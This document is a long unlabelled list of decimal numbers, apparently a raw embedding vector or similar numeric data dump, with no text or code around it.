0.02156946249306202, 0.01451113447546959, -0.012109048664569855, -0.02788110263645649, -0.00966469757258892, 0.005064808763563633, -0.009347707033157349, -0.005934772547334433, 0.014497046358883381, -0.005339534021914005, 0.010298678651452065, 0.0032456335611641407, -0.03245985880494118, -0.00862919446080923, 0.00867145974189043, 0.005564949940890074, -0.025866448879241943, 0.017497893422842026, -0.0014467107830569148, -0.005765710491687059, -0.0016272194916382432, -0.009932378306984901, 0.009185689501464367, 0.01985066942870617, -0.00022563581296708435, 0.01653987541794777, -0.010418430902063847, 0.014722461812198162, 0.023147372528910637, 0.005832630675286055, 0.00315405847504735, -0.0010363837936893106, -0.007283744402229786, 0.00488518038764596, 0.008396734483540058, 0.013468586839735508, 0.008854609914124012, -0.0029127933084964752, -0.006040435750037432, -0.02827557921409607, 0.021062277257442474, -0.015159204602241516, 0.030290232971310616, 0.006089745555073023, 0.007354186847805977, 0.004029305186122656, -0.01821640506386757, -0.007938859052956104, -0.001561179757118225, 0.015849540010094643, 0.008326292037963867, 0.009072980843484402, 0.008551707491278648, 0.0029691471718251705, -0.006593408994376659, 0.004635110031813383, 0.01601860299706459, -0.00572344521060586, -0.0016501132631674409, 0.0037545799277722836, -0.024147655814886093, 0.0036806154530495405, -0.00035837572067976, 0.01680755615234375, 0.023189637809991837, -0.012940268963575363, 0.012165402993559837, 0.017441539093852043, 0.013334746472537518, -0.025556502863764763, -0.03347422927618027, 0.008312202990055084, 0.017540158703923225, -0.01725838892161846, -0.007037195842713118, 0.006170754320919514, -0.023020576685667038, -0.00490631302818656, 0.013560161925852299, 0.020625535398721695, -0.019667519256472588, 0.005135251209139824, 0.03860243782401085, -0.004388561472296715, -0.0010513528250157833, -0.017272476106882095, 0.016835734248161316, 0.009587210603058338, 0.018822209909558296, -0.020414207130670547, -0.0011261978652328253, -0.010510005988180637, 0.004923923872411251, -0.014003949239850044, 0.011510288342833519, 0.0010416669538244605, 0.011510288342833519, 0.027937456965446472, -0.018554529175162315, -0.012559880502521992, 0.016948441043496132, 0.009122290648519993, 0.0252324678003788, -0.011024235747754574, 0.0066110193729400635, 0.016384903341531754, 0.019118066877126694, 0.0033266423270106316, -0.016356725245714188, -0.01039025466889143, 0.015765009447932243, 0.005772755015641451, 0.010580448433756828, 0.011897721327841282, -0.019836580380797386, 0.0005573754897341132, -0.00009955492714652792, 0.030515648424625397, 0.017483804374933243, 0.011052412912249565, -0.0036665271036326885, 0.005043676123023033, 0.013616516254842281, -0.005748100113123655, 0.015088762156665325, 0.022386595606803894, 0.012052695266902447, -0.0010989014990627766, -0.00842491164803505, 0.03150184080004692, 0.01239786297082901, -0.00012921777670271695, -0.0134544987231493, -0.0028863775078207254, -0.009629475884139538, -0.025387441739439964, 0.006075656972825527, 0.011651173233985901, 0.0017707458464428782, 0.0031170763541013002, -0.007551425602287054, -0.01148915570229292, 0.004857003688812256, -0.008044522255659103, 0.004536490421742201, 0.0116934385150671, -0.017793750390410423, 0.00286172260530293, 0.0021255994215607643, 0.001572626642882824, -0.01146802306175232, -0.00426880968734622, 0.009192733094096184, 0.01910397969186306, 0.0028687668964266777, -0.04522402212023735, -0.00767822191119194, 0.01050296239554882, -0.023570027202367783, -0.017145680263638496, -0.01918851025402546, -0.00442378269508481, -0.011785013601183891, 0.011573686264455318, -0.0029726694338023663, -0.03527755290269852, -0.016906175762414932, -0.01676529087126255, 0.017103414982557297, -0.01852635107934475, 0.023894062265753746, 0.024598486721515656, 0.005832630675286055, -0.02293604612350464, 0.01045365259051323, 0.009939422830939293, -0.0017628211062401533, 0.00009872942609945312, 0.006924488116055727, -0.019864756613969803, -0.011834323406219482, -0.01052409503608942, -0.005614259280264378, -0.022428860887885094, -0.020104261115193367, 0.001431741751730442, 0.005078897345811129, -0.016525788232684135, -0.028599614277482033, 0.005230348091572523, -0.033417876809835434, -0.002220696769654751, 0.00019162533862981945, 0.0010293396189808846, 0.0337841771543026, 0.0032403504010289907, -0.006508877966552973, 0.01852635107934475, 0.007220346014946699, 0.0015277195489034057, 0.0012670826399698853, -0.004370951093733311, 0.0032315452117472887, 0.013553118333220482, 0.021189074963331223, 0.0011860739905387163, 0.012116093188524246, -0.013306569308042526, 0.017047060653567314, -0.02802198752760887, 0.0117568364366889, 0.013313613831996918, 0.016032690182328224, -0.013581294566392899, -0.006906877271831036, -0.009629475884139538, 0.012031561695039272, -0.007495071738958359, -0.004656242672353983, 0.013306569308042526, -0.02130178175866604, 0.00871372502297163, 0.011179208755493164, 0.011594818904995918, -0.004388561472296715, -0.00526204751804471, -0.009326574392616749, -0.015187381766736507, -0.02837419882416725, 0.008586929179728031, 0.012982534244656563, 0.003337208880111575, 0.012158358469605446, 0.011270783841609955, 0.005036631599068642, 0.011087633669376373, -0.010791775770485401, -0.001494259457103908, 0.012827561236917973, 0.01570865511894226, -0.0034763324074447155, -0.001149091636762023, 0.008375601842999458, -0.008727813139557838, 0.004990844056010246, 0.006385603453963995, 0.02254156768321991, -0.004613977391272783, 0.0022453514393419027, -0.007621868047863245, -0.00383911095559597, -0.0030290232971310616, 0.004793605301529169, -0.014088480733335018, -0.01715976931154728, 0.04497043043375015, 0.008248805068433285, 0.020752331241965294, 0.011939986608922482, -0.014835169538855553, 0.0015347638400271535, 0.007255567237734795, 0.009777405299246311, -0.01043251994997263, 0.00672724936157465, -0.0028881384059786797, 0.012221756391227245, 0.02307693101465702, 0.002636306919157505, -0.013757401145994663, 0.007185124792158604, -0.008368557319045067, 0.007488027215003967, -0.025570591911673546, -0.013531985692679882, -0.018681325018405914, -0.01856861636042595, -0.023189637809991837, -0.020357854664325714, 0.0038285444024950266, -0.007297832984477282, 0.018639059737324715, 0.027416182681918144, -0.013665826059877872, -0.006012259051203728, 0.006459568161517382, -0.00964356493204832, -0.017836015671491623, -0.01624401845037937, -0.0007920367643237114, 0.013461543247103691, -0.0286277923732996, 0.011038323864340782, 0.005920683965086937, -0.004124402534216642, 0.0010134900221601129, 0.0335305817425251, 0.012785295955836773, 0.0062447190284729, -0.006614541634917259, 0.005075375083833933, 0.013158640824258327, 0.007149903569370508, 0.03462948277592659, -0.02496478706598282, 0.000854994636029005, -0.006586364470422268, -0.005797409452497959, -0.010023953393101692, 0.0005115879466757178, -0.014595665968954563, -0.0063292495906353, -0.011982252821326256, 0.02765568718314171, 0.006406736560165882, 0.006572275888174772, -0.00857988465577364, 0.002210130449384451, 0.017709219828248024, -0.0003442872257437557, 0.0013841931940987706, -0.010150750167667866, -0.003279093885794282, 0.0052761356346309185, -0.02320372685790062, 0.0018385467119514942, 0.017934635281562805, -0.03195267170667648, 0.009277264587581158, -0.001713511417619884, 0.005082419142127037, 0.0032650053035467863, 0.009319529868662357, 0.016962530091404915, -0.013067065738141537, 0.03088194876909256, 0.00844604428857565, 0.011770925484597683, 0.014320939779281616, 0.0033231202978640795, -0.011827278882265091, 0.009657653048634529, 0.012940268963575363, -0.00042903824942186475, -0.008657370693981647, 0.0021907587070018053, -0.019977465271949768, -0.02488025650382042, -0.008488309569656849, -0.007153425831347704, -0.00047548621660098433, -0.0046808975748717785, 0.0285855270922184, -0.015539593994617462, -0.0021115110721439123, 0.010347988456487656, -0.02082277461886406, -0.0028229791205376387, 0.008410822600126266, -0.0043322076089680195, -0.0025517758913338184, 0.006692028138786554, 0.01949845626950264, 0.0003665206313598901, 0.02461257576942444, -0.0014828125713393092, -0.000022467273083748296, -0.008354469202458858, -0.007030151784420013, 0.006515922024846077, -0.015201469883322716, 0.03947592154145241, 0.010664979927241802, 0.005047197919338942, 0.0062024532817304134, -0.023654557764530182, 0.006973797921091318, 0.004754862282425165, -0.0017760290065780282, -0.007600734941661358, -0.006241196766495705, 0.01566638983786106, 0.011108766309916973, 0.009397015906870365, 0.012743030674755573, 0.0009721051319502294, -0.032882511615753174, 0.0009412865620106459, -0.022964222356677055, -0.003655960550531745, 0.0019547767005860806, -0.0116934385150671, -0.011721615679562092, -0.013398144394159317, 0.0013190339086577296, -0.003631305880844593, 0.037616241723299026, -0.0036277836188673973, -0.011122855357825756, -0.007283744402229786, 0.017582423985004425, -0.008706680499017239, 0.017793750390410423, -0.002137926872819662, 0.017314741387963295, -0.002299944404512644, -0.003920119721442461, -0.014074391685426235, 0.008312202990055084, -0.007403496187180281, 0.014990143477916718, -0.021344047039747238, 0.02382362075150013, -0.017216123640537262, -0.014750638976693153, 0.02400677092373371, 0.006762470584362745, -0.016751203685998917, -0.021682171151041985, 0.013271348550915718, -0.004835871048271656, -0.005917161703109741, -0.020061995834112167, -0.013426321558654308, -0.00857988465577364, -0.002727882005274296, -0.003768668510019779, 0.03260074183344841, -0.013362923637032509, 0.005829108878970146, 0.007255567237734795, -0.016398990526795387, 0.013123419135808945, -0.025091582909226418, 0.0003614575834944844, -0.00979149341583252, 0.020216969773173332, -0.004913357552140951, -0.02073824219405651, 0.022569745779037476, 0.013017755933105946, -0.023358700796961784, 0.025345176458358765, 0.0007352425600402057, -0.0018878564005717635, 0.006272895727306604, -0.021513110026717186, -0.009544945321977139, -0.0108763063326478, 0.005966471508145332, 0.026317281648516655, 0.019428014755249023, 0.025063406676054, -0.0067413379438221455, 0.008129052817821503, -0.01627219468355179, -0.005107074044644833, -0.017145680263638496, 0.00864328257739544, 0.004427304957062006, 0.0027613420970737934, -0.008396734483540058, -0.0072766998782753944, -0.0061320108361542225, 0.002572908764705062, 0.007185124792158604, -0.015948159620165825, -0.009220910258591175, -0.009178644977509975, 0.014482957310974598, -0.0033248814288526773, 0.01637081429362297, -0.003342492040246725, -0.005170472431927919, 0.011341226287186146, 0.006913921795785427, 0.019977465271949768, 0.01151733286678791, -0.010094395838677883, 0.02297831140458584, 0.009805582463741302, -0.015722744166851044, 0.008431955240666866, -0.004057482350617647, 0.0116723058745265, 0.013123419135808945, -0.0039130751974880695, 0.0009377644746564329, 0.0108340410515666, -0.014835169538855553, -0.002518315799534321, -0.010643847286701202, 0.012651455588638783, 0.005505073815584183, -0.0014009232399985194, 0.016666671261191368, 0.004775994922965765, -0.010122573003172874, -0.001284693251363933, 0.00021539966110140085, -0.01985066942870617, 0.013870108872652054, -0.025119761005043983, -0.015257824212312698, 0.00011556956451386213, -0.016427168622612953, 0.016948441043496132, -0.006547620985656977, 0.007664133328944445, -0.02051282674074173, -0.019864756613969803, 0.00014550758351106197, 0.010164838284254074, 0.0016483522485941648, -0.01076359860599041, -0.009080025367438793, -0.004913357552140951, 0.007030151784420013, 0.01244012825191021, -0.0025359264109283686, 0.0009668219718150795, -0.014130746014416218, -0.009904202073812485, 0.012496481649577618, 0.001222175662405789, -0.0008809702703729272, 0.0038884205278009176, -0.005198649130761623, 0.011989296413958073, -0.016483521088957787, 0.0025429707020521164, 0.03229079768061638, 0.01060862559825182, -0.00842491164803505, -0.0029867577832192183, -0.009481547400355339, 0.002523598959669471, 0.006892789155244827, 0.006301072891801596, 0.003564385464414954, -0.028036076575517654, 0.002712032524868846, -0.020808685570955276, 0.017145680263638496, -0.014158922247588634, -0.01065793540328741, 0.03268527239561081, 0.01453931163996458, -0.028472818434238434, -0.0047689503990113735, -0.015370531938970089, 0.021273605525493622, 0.013616516254842281, 0.0070477621629834175, 0.021160896867513657, 0.011263740248978138, 0.008291070349514484, 0.022386595606803894, 0.03234715014696121, 0.003280854783952236, -0.020146526396274567, 0.009206822142004967, -0.03533390909433365, 0.006892789155244827, 0.004775994922965765, -0.006047480273991823, -0.03260074183344841, 0.0013674631481990218, -0.005800931714475155, 0.0073260096833109856, -0.011052412912249565, 0.0034604829270392656, -0.009361795149743557, 0.0006498311413452029, 0.007149903569370508, -0.013271348550915718, -0.016708938404917717, -0.01800507865846157, 0.004807693883776665, -0.0010557555360719562, 0.023415055125951767, -0.002652156399562955, -0.0056565250270068645, 0.00867145974189043, -0.02638772316277027, -0.025570591911673546, -0.0019177943468093872, 0.004473092500120401, -0.025401530787348747, -0.02210482582449913, 0.012080871500074863, -0.01350380852818489, -0.03347422927618027, -0.019695695489645004, 0.01672302559018135, 0.00767822191119194, 0.015032408758997917, -0.005269091576337814, -0.016089044511318207, 0.020498739555478096, -0.01618766412138939, -0.0014819320058450103, -0.012341508641839027, -0.015624124556779861, -0.012355596758425236, -0.01149620022624731, -0.023302346467971802, 0.007882504723966122, -0.012996623292565346, -0.01043251994997263, -0.030374763533473015, 0.0036630048416554928, 0.004166667815297842, 0.003972951322793961, -0.045590322464704514, -0.013088198378682137, 0.011390536092221737, -0.007995212450623512, 0.006272895727306604, -0.020484650507569313, 0.019864756613969803, -0.0034798546694219112, -0.008234716951847076, -0.01583545096218586, 0.008305159397423267, -0.003432305995374918, -0.0019125111866742373, -0.02206256054341793, 0.01045365259051323, 0.011904765851795673, 0.023260081186890602, -0.01844182051718235, 0.003372429870069027, -0.032178089022636414, 0.008875742554664612, 0.007174558471888304, 0.010552271269261837, 0.016652584075927734, -0.022259799763560295, 0.005409976467490196, 0.005969993304461241, 0.020836861804127693, -0.011961120180785656, 0.004980277735739946, 0.0065229665488004684, -0.01570865511894226, -0.011320093646645546, 0.009087069891393185, -0.027430271729826927, 0.022006206214427948, -0.01711750403046608, -0.00009344625141238794, -0.017666954547166824, 0.008234716951847076, 0.010594537481665611, 0.009375883266329765, -0.013447454199194908, 0.007403496187180281, 0.0032368283718824387, -0.025739653035998344, 0.00487461406737566, 0.00386024359613657, 0.008896875195205212, -0.018808120861649513, 0.017371095716953278, 0.008925052359700203, -0.0021062279120087624, -0.004134968854486942, 0.002210130449384451, 0.007495071738958359, 0.02293604612350464, -0.005638914182782173, 0.010319812223315239, -0.005557905416935682, -0.026176396757364273, 0.001847352017648518, 0.015046496875584126, -0.012630322948098183, 0.0045928447507321835, 0.020836861804127693, -0.0043040309101343155, 0.002775430679321289, -0.010664979927241802, 0.014835169538855553, -0.01078473124653101, -0.019160334020853043, 0.0005912759224884212, -0.012313331477344036, -0.005043676123023033, 0.026542697101831436, -0.011017191223800182, -0.001147330622188747, -0.010749510489404202, -0.011770925484597683, 0.013313613831996918, -0.012066783383488655, 0.007480983156710863, 0.002428501844406128, -0.021625816822052002, -0.017145680263638496, -0.025965068489313126, 0.004624543711543083, 0.00674838200211525, 0.005906595382839441, -0.02059735730290413, 0.00886869803071022, 0.012869826517999172, -0.01720203459262848, 0.009368839673697948, -0.009030715562403202, -0.0007554947515018284, -0.010397298261523247, -0.017413360998034477, 0.00388137623667717, 0.026500431820750237, 0.0013269587652757764, 0.03358693793416023, -0.009270220063626766, 0.016131309792399406, 0.0015479717403650284, -0.003969429526478052, 0.012242889031767845, -0.008058610372245312, 0.006068612914532423, -0.007530292496085167, -0.00588898453861475, -0.00957312248647213, -0.005952382925897837, -0.005255002994090319, 0.025486061349511147, -0.002648634370416403, -0.011235563084483147, -0.021203162148594856, 0.0033002265263348818, -0.005938294343650341, 0.004053960088640451, 0.01628628373146057, 0.008157229982316494, -0.016610318794846535, 0.015807274729013443, 0.0009773883502930403, 0.0044625261798501015, -0.005374755244702101, 0.010791775770485401, 0.017004795372486115, 0.002287616953253746, -0.01266554370522499, 0.013264304026961327, -0.010686112567782402, 0.020667800679802895, 0.0029497756622731686, -0.007171036675572395, 0.00243730703368783, -0.020005641505122185, -0.00842491164803505, -0.02907862327992916, -0.008354469202458858, 0.009939422830939293, -0.024288540706038475, -0.011651173233985901, 0.002993802074342966, -0.03313610702753067, 0.006931532174348831, -0.0012987818336114287, -0.012834605760872364, 0.010362077504396439, 0.007065373007208109, -0.003062483388930559, -0.0071569480933249, -0.006096789613366127, -0.0014933788916096091, 0.000321833707857877, -0.005977037828415632, -0.0005261166952550411, 0.0015083479229360819, -0.003958862740546465, 0.017173858359456062, -0.009115247055888176, 0.020498739555478096, -0.0015330027090385556, 0.005402932409197092, -0.008720769546926022, -0.007734575774520636, 0.011059457436203957, 0.009833759628236294, 0.011827278882265091, -0.0002674610004760325, 0.0009571361006237566, 0.013863064348697662, -0.007255567237734795, 0.003555580275133252, 0.020329676568508148, 0.006586364470422268, -0.012073827907443047, -0.012144270353019238, 0.002356298267841339, -0.018230494111776352, 0.0019811925012618303, 0.00016620004316791892, -0.0050577642396092415, -0.007516204379498959, -0.00001681262074271217, -0.012404906563460827, 0.0006568753742612898, -0.004089181311428547, 0.02148493193089962, 0.0018720068037509918, 0.008431955240666866, -0.0016835733549669385, -0.002504227450117469, -0.0004147296422161162, 0.005730489268898964, 0.01524373609572649, -0.014652019366621971, -0.014173011295497417, -0.0049873217940330505, -0.013095241971313953, -0.03350240737199783, 0.0004842915222980082, -0.0006740457029081881, -0.005786843132227659, -0.0017496130894869566, -0.0025464927311986685, 0.004177234601229429, 0.0029673862736672163, 0.0032562001142650843, -0.00009471201337873936, -0.02059735730290413, 0.007600734941661358, -0.0034728103782981634, -0.008340380154550076, -0.005793887656182051, 0.0009597777388989925, -0.0005622184253297746, -0.010249369777739048, 0.005230348091572523, -0.03851790353655815, -0.010150750167667866, 0.005311356857419014, 0.002625740598887205, 0.01166526135057211, -0.02876867726445198, -0.00588898453861475, -0.0012001624563708901, -0.038884203881025314, 0.009974643588066101, 0.005395887885242701, -0.01148915570229292, 0.010848130099475384, 0.022358417510986328, 0.0062552853487432, -0.003354819258674979, -0.017145680263638496, -0.006783603224903345, 0.019089890643954277, -0.0006758067756891251, 0.012017473578453064, 0.01555368211120367, -0.01808960922062397, 0.0009095874847844243, -0.0018949005752801895, 0.025162026286125183, -0.014173011295497417, -0.013334746472537518, 0.029811223968863487, -0.023316435515880585, -0.012144270353019238, 0.010355032980442047, -0.01555368211120367, 0.00215025432407856, 0.015046496875584126, -0.005797409452497959, -0.0033301645889878273, -0.011397580616176128, 0.018075520172715187, 0.0012001624563708901, 0.009911245666444302, 0.0015814319485798478, -0.015342354774475098, 0.011524376459419727, 0.0064807008020579815, 0.02316146157681942, -0.019470280036330223, -0.000570583448279649, -0.0002769267011899501, -0.009890113025903702, 0.005124684888869524, 0.03003663942217827, 0.0269512627273798, 0.005550861358642578, 0.004096225835382938, 0.0025852362159639597, -0.007192169316112995, 0.007931814529001713, 0.0051880828104913235, -0.026880821213126183, 0.01160186342895031, -0.018019165843725204, -0.008664415217936039, -0.02390815131366253, 0.022879691794514656, 0.004293464589864016, 0.026303192600607872, 0.025119761005043983, 0.005103551782667637, 0.0010196537477895617, 0.013031844049692154, -0.0018649626290425658, -0.0031716690864413977, 0.007438717409968376, -0.0062658516690135, 0.016131309792399406, 0.0048112161457538605, 0.024161743000149727, 0.007713443133980036, -0.005631870124489069, 0.00959425512701273, -0.017878280952572823, 0.022907868027687073, -0.017497893422842026, -0.0007440478657372296, 0.005529728718101978, 0.013045933097600937, 0.03431953862309456, -0.008946185000240803, 0.010953793302178383, -0.012869826517999172, 0.004927446134388447, 0.002513032639399171, -0.012116093188524246, -0.008770079351961613, -0.01162299606949091, -0.006213019602000713, -0.02324599213898182, -0.005543816834688187, 0.005445197690278292, -0.014821081422269344, 0.0003707031428348273, 0.002277050632983446, 0.00019789912039414048, -0.015342354774475098, 0.007797973696142435, -0.014299807138741016, 0.011552553623914719, 0.013257259503006935, -0.004349818453192711, -0.00270851026289165, -0.011186253279447556, -0.008812344633042812, 0.016737114638090134, 0.02461257576942444, -0.006001692730933428, 0.006931532174348831, -0.01627219468355179, 0.008227672427892685, -0.008481265045702457, 0.014370249584317207, 0.0019512545550242066, 0.006864611990749836, -0.01367991417646408, -0.00013428082456812263, -0.022076647728681564, -0.00037004274781793356, 0.0007757469429634511, -0.002285855822265148, -0.010559315793216228, 0.009587210603058338, 0.0022752895019948483, -0.012827561236917973, -0.0023774311412125826, -0.011968163773417473, 0.006360949017107487, 0.002636306919157505, -0.006864611990749836, 0.004631587769836187, 0.014116656966507435, -0.0068998332135379314, -0.0012301004026085138, -0.015271912328898907, 0.028529172763228416, 0.02241477183997631, 0.03133277967572212, -0.004226543940603733, 0.0039025091100484133, 0.022781072184443474, 0.00842491164803505, -0.00008111882925732061, 0.014109613373875618, 0.012348553165793419, 0.005001410376280546, -0.023372787982225418, -0.00959425512701273, 0.00966469757258892, 0.002009369432926178, 0.012017473578453064, 0.0023492539767175913, 0.002641590079292655, -0.007790929637849331, -0.0020128916949033737, 0.01777966134250164, 0.006973797921091318, 0.0249788761138916, -0.01610313355922699, -0.0026539175305515528, 0.002784235868602991, -0.0054487199522554874, 0.0025588201824575663, 0.017666954547166824, 0.00669555040076375, 0.016553964465856552, -0.010862218216061592, -0.02130178175866604, 0.003962385002523661, -0.009136379696428776, -0.013581294566392899, 0.013271348550915718, 0.017540158703923225, -0.0015602991916239262, -0.007431673351675272, -0.007593690883368254, -0.004938012454658747, -0.0013084675883874297, 0.02135813608765602, -0.053846172988414764, -0.0013031844282522798, -0.011813190765678883, -0.017568334937095642, -0.0026856164913624525, -0.019075801596045494, -0.001502184197306633, -0.00865032710134983, -0.01632854901254177, 0.029895754531025887, 0.00532544543966651, 0.0016501132631674409, 0.004797127563506365, 0.016779379919171333, 0.014454781077802181, -0.014905611984431744, 0.006089745555073023, 0.0072766998782753944, -0.007241478655487299, 0.025288822129368782, -0.0061637102626264095, -0.014609754085540771, 0.007382363546639681, 0.00019327634072396904, 0.008234716951847076, 0.005043676123023033, 0.0267399363219738, -0.021329959854483604, -0.015497328713536263, -0.019244864583015442, -0.003367146709933877, 0.022668365389108658, -0.006325727794319391, -0.009502680040895939, 0.0066004530526697636, -0.03758806362748146, -0.019216686487197876, -0.008974362164735794, 0.014243453741073608, 0.008269937708973885, -0.0005912759224884212, 0.03409412130713463, 0.023640470579266548, -0.0033266423270106316, 0.01637081429362297, -0.0268667321652174, 0.0032614832744002342, -0.0019160333322361112, 0.009699918329715729, 0.00968583021312952, 0.021513110026717186, 0.0067307716235518456, 0.022245710715651512, -0.019132155925035477, -0.009897157549858093, 0.01070020068436861, 0.016976619139313698, -0.014792904257774353, 0.03899691253900528, -0.012193579226732254, -0.013271348550915718, 0.0042018890380859375, -0.014961966313421726, 0.00667441776022315, 0.014637931250035763, 0.024908432736992836, 0.015004231594502926, 0.004867570009082556, 0.0108763063326478, 0.007861372083425522, -0.0065124002285301685, -0.008157229982316494, -0.01954072155058384, -0.005469852592796087, -0.006903355475515127, -0.0010170121677219868, 0.005758666433393955, -0.009108202531933784, -0.02055509202182293, 0.023640470579266548, -0.0017645821208134294, -0.02426036261022091, 0.012693720869719982, 0.014440692029893398, -0.006332771852612495, 0.0063292495906353, -0.009467458352446556, 0.017610600218176842, -0.0055966489017009735, -0.014074391685426235, 0.03243168070912361, -0.0054275868460536, -0.04536490514874458, 0.020047906786203384, 0.00488518038764596, 0.0042335884645581245, -0.010791775770485401, 0.009227954782545567, -0.0024461124558001757, 0.02073824219405651, -0.015102851204574108, 0.008016345091164112, -0.0036700491327792406, 0.0010865740478038788, 0.012102004140615463, -0.006449001841247082, -0.02130178175866604, 0.010418430902063847, 0.000714109861291945, -0.009918290190398693, 0.009023671969771385, 0.011108766309916973, 0.024499867111444473, -0.00972809549421072, -0.008037477731704712, -0.014863346703350544, -0.0022013250272721052, 0.018300935626029968, -0.005818542558699846, 0.004659764934331179, 0.021034101024270058, 0.007005496881902218, 0.021949851885437965, 0.023133285343647003, -0.01606086827814579, -0.004638632293790579, 0.023274170234799385, 0.006477179005742073, 0.005469852592796087, -0.013482675887644291, -0.002784235868602991, 0.014123701490461826, 0.000048566733312327415, -0.008319247514009476, -0.01367991417646408, -0.005586082581430674, 0.013856020756065845, 0.00862214993685484, -0.014482957310974598, -0.005483941175043583, -0.00571287889033556, -0.018033254891633987, -0.01949845626950264, 0.0038074117619544268, 0.0015470912912860513, -0.024387158453464508, -0.006047480273991823, 0.0061038341373205185, 0.003071288811042905, 0.00984080322086811, 0.013531985692679882, 0.016511699184775352, 0.007713443133980036, 0.0117568364366889, 0.0009360034018754959, 0.02328825742006302, -0.009347707033157349, -0.00972809549421072, -0.008417867124080658, 0.0032368283718824387, 0.004702030215412378, 0.030825594440102577, 0.0076148235239088535, -0.0016148920403793454, -0.011256695725023746, -0.0033495360985398293, 0.00615314394235611, -0.00966469757258892, 0.0018209361005574465, -0.001651874277740717, 0.03234715014696121, 0.022090736776590347, 0.000251391320489347, 0.00019459713075775653, 0.02779657207429409, 0.005142295267432928, 0.0026820944622159004, -0.019921110942959785, 0.008946185000240803, -0.015032408758997917, -0.02297831140458584, 0.019526634365320206, -0.02978304773569107, 0.00004080706275999546, -0.006385603453963995, -0.013665826059877872, 0.01263736654073, -0.005505073815584183, -0.0036630048416554928, 0.021639905869960785, 0.019864756613969803, -0.007153425831347704, -0.0021837144158780575, -0.026458166539669037, 0.008953229524195194, -0.0069773197174072266, -0.005505073815584183, 0.008298114873468876, -0.011348270811140537, -0.005645958241075277, 0.015765009447932243, 0.0071182046085596085, 0.0002472088090144098, 0.02100592479109764, 0.01645534485578537, -0.025345176458358765, 0.022442949935793877, 0.008854609914124012, -0.0030519170686602592, -0.011073545552790165, 0.021372225135564804, -0.007410540711134672, -0.0035309253726154566, -0.006188365165144205, -0.004050438292324543, 0.00428994232788682, -0.003007890423759818, 0.019399836659431458, -0.0013348835054785013, -0.010946748778223991, 0.03437589108943939, 0.006375037133693695, -0.011876588687300682, 0.0014106091111898422, -0.017272476106882095, 0.017948724329471588, 0.004134968854486942, 0.02078050933778286, 0.0036665271036326885, 0.014215276576578617, -0.013482675887644291, 0.020174704492092133, 0.014137789607048035, 0.014003949239850044, -0.0008012822945602238, 0.013926463201642036, -0.0008276982116512954, 0.0125528359785676, 0.010185970924794674, -0.023260081186890602, 0.0025147937703877687, -0.0006806497112847865, -0.006847001612186432, -0.017173858359456062, -0.0004470891144592315, 0.007945902645587921, 0.023189637809991837, 0.019752049818634987, -0.0029480145312845707, -0.011460978537797928, 0.012926180846989155, 0.021287694573402405, -0.03440406918525696, 0.0005093865911476314, -0.01446886919438839, 0.010263457894325256, -0.014440692029893398, -0.0025253600906580687, 0.03493943065404892, -0.007093549706041813, -0.004131447058171034, 0.007389408070594072, 0.027740217745304108, 0.017751485109329224, 0.012024518102407455, -0.008333335630595684, -0.006720205303281546, -0.03212173655629158, -0.01047478523105383, 0.003294943366199732, -0.0036066509783267975, 0.018934916704893112, -0.011052412912249565, -0.02197802998125553, -0.011566642671823502, -0.013975772075355053, -0.00017577580001670867, 0.0038426329847425222, 0.009263175539672375, 0.009622432291507721, -0.00441321637481451, 0.0010962599189952016, -0.025655122473835945, -0.013975772075355053, 0.008467176929116249, 0.005480418913066387, -0.030684709548950195, -0.009876024909317493, -0.014849258586764336, 0.019794315099716187, 0.02823331393301487, 0.008544662967324257, 0.02214709110558033, -0.021724436432123184, -0.027430271729826927, -0.017920546233654022, 0.000056629087339388207, -0.010622713714838028, -0.0268667321652174, 0.020977746695280075, -0.017131591215729713, -0.02333052270114422, -0.005586082581430674, -0.0011799102649092674, 0.0006810899940319359, 0.01989293470978737, 0.021428577601909637, -0.0062552853487432, 0.00241617439314723, 0.001989997923374176, 0.0047407737001776695, 0.0034023679327219725, 0.03119189478456974, 0.0035397305618971586, 0.00977036077529192, -0.007671177387237549, -0.004589322488754988, 0.005409976467490196, -0.0013146313140168786, 0.010904483497142792, -0.008319247514009476, -0.016511699184775352, -0.017089325934648514, -0.022696541622281075, -0.011249651201069355, 0.026627227663993835, 0.025119761005043983, -0.011298961006104946, 0.01579318568110466, 0.008030434139072895, -0.007297832984477282, 0.016131309792399406, 0.0007933575543574989, 0.014708373695611954, -0.017934635281562805, 0.009361795149743557, -0.01628628373146057, -0.018963094800710678, -0.013405188918113708, -0.0031593416351825, 0.028346022590994835, -0.0028141739312559366, -0.0034446334466338158, 0.015934070572257042, -0.006456045899540186, -0.0042335884645581245, 0.0013868347741663456, 0.023105107247829437, -0.0017073476919904351, -0.00004650299160857685, 0.0007431673584505916, -0.0022647231817245483, -0.007621868047863245, -0.0049591450951993465, 0.025669211521744728, 0.019907021895051003, 0.026303192600607872, 0.007195691112428904, -0.003432305995374918, -0.000994998961687088, 0.005036631599068642, -0.000894178228918463, -0.002273528603836894, -0.009650609456002712, -0.02295013517141342, 0.022555656731128693, -0.000927198096178472, 0.008072699420154095, -0.009129335172474384, 0.005508595611900091, -0.004547057207673788, -0.0134544987231493, 0.014412514865398407, 0.008044522255659103, -0.006438435520976782, 0.015032408758997917, -0.022668365389108658, -0.0023950417526066303, 0.00970696285367012, -0.019216686487197876, 0.050183165818452835, -0.0029568197205662727, 0.03181178867816925, -0.006956187076866627, -0.0044026500545442104, -0.018582705408334732, -0.011721615679562092, 0.023767266422510147, 0.010974925942718983, 0.007340098265558481, -0.014306851662695408, -0.00028176960768178105, -0.011143987998366356, -0.005540295038372278, -0.014961966313421726, -0.00570231257006526, -0.011961120180785656, -0.006213019602000713, -0.00767822191119194, 0.00772048719227314, -0.0033918016124516726, 0.007868416607379913, 0.006195409223437309, -0.013137508183717728, 0.017103414982557297, -0.0002226640353910625, -0.01358833909034729, 0.01862497068941593, 0.009939422830939293, -0.021653994917869568, -0.00048385123955085874, -0.008375601842999458, 0.018427731469273567, -0.03324881196022034, 0.0117568364366889, 0.0008378243073821068, -0.0002791280276142061, 0.022076647728681564, -0.002694421913474798, 0.0055262064561247826, 0.0010575165506452322, 0.006124966777861118, -0.016398990526795387, 0.008840521797537804, 0.016469433903694153, 0.0025464927311986685, 0.0015867151087149978, 0.01045365259051323, -0.0071182046085596085, -0.001783953863196075, -0.00028727290919050574, -0.01892082951962948, -0.028712322935461998, -0.002770147519186139, 0.006614541634917259, -0.015046496875584126, -0.011890677735209465, -0.011101722717285156, -0.012454216368496418, -0.006575798150151968, -0.01058749295771122, -0.01155959814786911, 0.01928712986409664, 0.0044026500545442104, -0.011552553623914719, -0.0005943577853031456, 0.01566638983786106, 0.01473654992878437, 0.0005683821509592235, -0.008086787536740303, 